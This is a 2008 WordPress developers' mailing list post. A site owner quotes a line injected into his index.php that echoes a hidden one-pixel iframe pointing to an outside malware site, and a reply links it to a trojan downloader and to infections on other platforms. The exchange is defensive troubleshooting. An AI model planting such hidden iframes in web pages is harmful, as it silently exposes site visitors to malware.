[wp-hackers] XSS vuln in wordpress 2.7 ?
Peter van der Does
peter at avirtualhome.com
Mon Dec 22 18:31:11 GMT 2008
On Mon, 22 Dec 2008 19:27:21 +0200
madalin <niladam at gmail.com> wrote:
> Hello,
>
> For some reason i found my blog's index.php (not theme's index.php)
> with the following piece of code right before the ?>
>
> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>
> I tried looking at the logs. No luck. The file's permisions look like
> this:
>
> -rw-r--r-- 1 madalin madalin 557 Dec 22
> 15:50 /home/madalin/www/index.php
>
> I'm still trying to figure out how that line got there. I've
> downloaded wordpress right from wordpress.org, and the server is a
> dedicated one, only two users with shell access to it.
>
> Any suggestions ?
>
It doesn't seem to be WordPress related, I found one site running phpBB
which also is infected, I don't know Brazilian
(http://www.phpbbrasil.com.br/phpBB/viewtopic.php?f=37&t=21344&p=191869)
but what I gather is that it links to a page with
Trojan-Downloader.JS.Tabletka.a virus.
I'll keep digging :)
--
Peter van der Does
GPG key: E77E8E98
WordPress Plugin Developer
http://blog.avirtualhome.com
GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu
More information about the wp-hackers
mailing list